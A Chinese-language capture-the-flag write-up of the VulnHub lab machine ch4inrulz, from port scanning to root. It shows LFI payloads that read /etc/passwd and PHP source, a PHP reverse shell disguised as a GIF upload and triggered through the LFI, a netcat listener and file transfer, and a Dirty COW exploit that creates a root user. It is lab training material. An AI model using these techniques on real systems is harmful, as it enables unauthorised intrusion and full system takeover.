靶场地址:https://www.vulnhub.com/entry/ch4inrulz-101,247/
1. 信息搜集
主机发现
arp-scan
10.10.10.167 00:0c:29:c5:a1:1a VMware, Inc.
端口扫描
sudo nmap -Pn -O -sV 10.10.10.167
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
8011/tcp open http Apache httpd 2.2.22 ((Ubuntu))
OS details: Linux 2.6.19 - 2.6.36
目录扫描
dirb http://10.10.10.167/
---- Scanning URL: http://10.10.10.167/ ----
+ http://10.10.10.167/cgi-bin/ (CODE:403|SIZE:288) Apache/2.2.22 (Ubuntu) Server at 10.10.10.167 Port 80
==> DIRECTORY: http://10.10.10.167/css/
+ http://10.10.10.167/development (CODE:401| SIZE:479)
==> DIRECTORY: http://10.10.10.167/img/
+ http://10.10.10.167/index (CODE:200|SIZE:334)
+ http://10.10.10.167/index.html (CODE:200|SIZE:13516)
==> DIRECTORY: http://10.10.10.167/js/
+ http://10.10.10.167/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.167/robots (CODE:200|SIZE:21)
+ http://10.10.10.167/robots.txt (CODE:200|SIZE:21)
+ http://10.10.10.167/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://10.10.10.167/vendor/
dirb http://10.10.10.167:8011/
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.167:8011/ ----
==> DIRECTORY: http://10.10.10.167:8011/api/
+ http://10.10.10.167:8011/index.html (CODE:200|SIZE:30)
+ http://10.10.10.167:8011/server-status (CODE:403|SIZE:295)
---- Entering directory: http://10.10.10.167:8011/api/ ----
+ http://10.10.10.167:8011/api/index.html (CODE:200|SIZE:351)
大致访问一下:
-
http://10.10.10.167/index frank的个人主页
-
http://10.10.10.167/development (CODE:401| SIZE:479) 登录窗
-
http://10.10.10.167/vendor/ 文件遍历漏洞,/img, /js也是。
-
http://10.10.10.167:8011 开发中
-
http://10.10.10.167:8011/api/ 一些开发中的php:
- web_api.php, database_api.php, records_api.php 全部404
-
files_api.php , 提示需要一个file参数
Bp(change reqeust method) Post请求http://10.10.10.167:8011/api/files_api.php , file=/etc/passwd,可以看到passwd内容回显,注意到有个frank用户:
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
至此没有啥别的信息了。
有些开发有备份文件的喜欢,再扫一次:
$ dirb http://10.10.10.167/ -X .bak
---- Scanning URL: http://10.10.10.167/ ----
+ http://10.10.10.167/index.html.bak (CODE:200|SIZE:334)
访问一下:
$ curl http://10.10.10.167/index.html.bak
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>
保存密码hash:
frank:oIGDEDK$/aVFPluYt56UvslZMBDoC0:
破解:
$ john ./frank_pwd.txt --show
frank:frank!!!
1 password hash cracked, 0 left
2. Exploit
ftp/ssh
ftp可以用msf爆破登录。之前没爆破成功。直接登录:
$ ftp 10.10.10.167
Connected to 10.10.10.167.
220 (vsFTPd 2.3.5)
Name (10.10.10.167:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /var/www
550 Failed to change directory.
登是登上了,不过折腾了会没啥用。ssh则是没登上。
http
登录http://10.10.10.167/development成功,提示:
* Here is my unfinished tools list
- the uploader tool (finished but need security review)
判断还有个url: http://10.10.10.167/development/uploader/, 可以上传图片。
File is an image - image/png.The file 1.png has been uploaded to my uploads path.
上传个普通的php文件:
File is not an image.Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.
先不急着上传图片木马,梳理一下思路。已知http://10.10.10.167:8011/api/files_api.php 有本地文件包含(LFI)漏洞,现在需要知道图片路径。
<form action="upload.php" method="post" enctype="multipart/form-data">
<p>Select image to upload:</p>
<p><input type="file" name="fileToUpload" id="fileToUpload"></p>
<p><input type="submit" value="Upload Image" name="submit"></p>
</form>
猜测上传文件的代码是/var/www/development/uploader/upload.php,尝试用LFI漏洞访问它:
POST /api/files_api.php HTTP/1.1
...
file=/var/www/development/uploader/upload.php
结果php被执行了:
Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.
那么尝试使用PHP伪协议获取它:
POST /api/files_api.php HTTP/1.1
...
file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php
返回了upload.php的base64编码,用bp decoder模块解密:
<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
$check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
if($check !== false) {
echo "File is an image - " . $check["mime"] . ".";
$uploadOk = 1;
} else {
echo "File is not an image.";
$uploadOk = 0;
}
}
// Check if file already exists
if (file_exists($target_file)) {
echo "Sorry, file already exists.";
$uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
echo "Sorry, your file is too large.";
$uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
$uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
} else {
echo "Sorry, there was an error uploading your file.";
}
}
?>
文件的存储路径应该是/development/uploader/FRANKuploads。
使用kali自带的php反向连接木马:/usr/share/webshells/php/php-reverse-shell.php,在文件开头加上gif格式的文本magic:GIF89a
,改名为frank.gif。上传成功后用nc监听: nc -lvvp 1234 。
LFI漏洞访问这个图片:
POST /api/files_api.php HTTP/1.1
...
file=/var/www/development/uploader/FRANKuploads/frank1.gif
反弹shell成功。
$ nc -lvvp 1234
listening on [any] 1234 ...
connect to [10.10.10.160] from 10.10.10.167 [10.10.10.167] 45104
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
09:09:22 up 2:08, 0 users, load average: 0.05, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/$ uname -a
uname -a
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
www-data@ubuntu:/$
当前是www-data用户,下一步需要提权。
提权
用dirtycow漏洞。也可以searchsploit dirty
搜索kali内置poc。
该漏洞影响范围Linux kernel 2.6.22 < 3.9。
接收:
www-data@ubuntu:/tmp$ nc -l 1234 > dirty.c
发送:
$ nc 10.10.10.167 1234 < dirty.c
当然也可以python -m SimpleHTTPServer
启动一个服务器,收方用wget接收。
编译:
www-data@ubuntu:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@ubuntu:/tmp$ ls
ls
VMwareDnD _cafenv-appconfig_ dirty dirty.c vmware-root
www-data@ubuntu:/tmp$ ./dirty newuserpassword
./dirty newuserpassword
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: newuserpassword
Complete line:
firefart:fiepnnSO6fvZA:0:0:pwned:/root:/bin/bash
创建了firefart用户,登录一下:
www-data@ubuntu:/tmp$ su firefart
su firefart
Password: newuserpassword
firefart@ubuntu:/tmp# whoami
whoami
firefart
firefart@ubuntu:/tmp# id
id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@ubuntu:/tmp# cd ~
cd ~
firefart@ubuntu:~# ls
ls
root.txt
firefart@ubuntu:~# cat roo
cat root.txt
8f420533b79076cc99e9f95a1a4e5568
firefart@ubuntu:~# cat root.txt
cat root.txt
8f420533b79076cc99e9f95a1a4e5568
firefart@ubuntu:~#
也可以ssh firefart@10.10.10.167
登录。
完工后,还原一下/etc/passwd, 清理下痕迹balabala。